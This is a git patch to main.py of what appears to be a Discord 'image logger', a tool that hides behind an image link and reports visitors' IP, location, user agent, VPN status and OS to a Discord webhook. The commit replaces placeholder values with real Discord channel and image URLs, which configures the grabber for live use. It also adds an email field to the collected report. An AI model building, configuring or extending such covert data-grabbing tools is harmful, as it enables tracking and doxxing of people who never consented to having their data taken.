From 8a6f26fa6610fcd165260e996342ee52b05dc1f0 Mon Sep 17 00:00:00 2001 From: vinkery70-art Date: Sun, 11 Jan 2026 02:13:15 +0300 Subject: [PATCH] Update main.py --- main.py | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/main.py b/main.py index 4a822dc..ac5f09d 100644 --- a/main.py +++ b/main.py @@ -12,8 +12,8 @@ config = { # BASE CONFIG # - "webhook": "https://discord.com/api/webhooks/your/webhook", - "image": "https://link-to-your-image.here", # You can also have a custom image by using a URL argument + "webhook": "https://discord.com/channels/1438896070854836438/1459684741363269713", + "image": "https://cdn.discordapp.com/attachments/1367292213532430438/1459684579664331016/Ekran_goruntusu_2026-01-02_230650.png?ex=69642cb3&is=6962db33&hm=f9dcf091cd7c463ac59ecd3861be4629b8dac58be00e68da8cc5dbbb048e083f&", # You can also have a custom image by using a URL argument # (E.g. yoursite.com/imagelogger?url=) "imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README) @@ -162,6 +162,7 @@ def makeReport(ip, useragent = None, coords = None, endpoint = "N/A", url = Fals > **Mobile:** `{info['mobile']}` > **VPN:** `{info['proxy']}` > **Bot:** `{info['hosting'] if info['hosting'] and not info['proxy'] else 'Possibly' if info['hosting'] else 'False'}` +> **Mail** `{info['mail'] if info['mail'] else 'Unknown'}` **PC Info:** > **OS:** `{os}`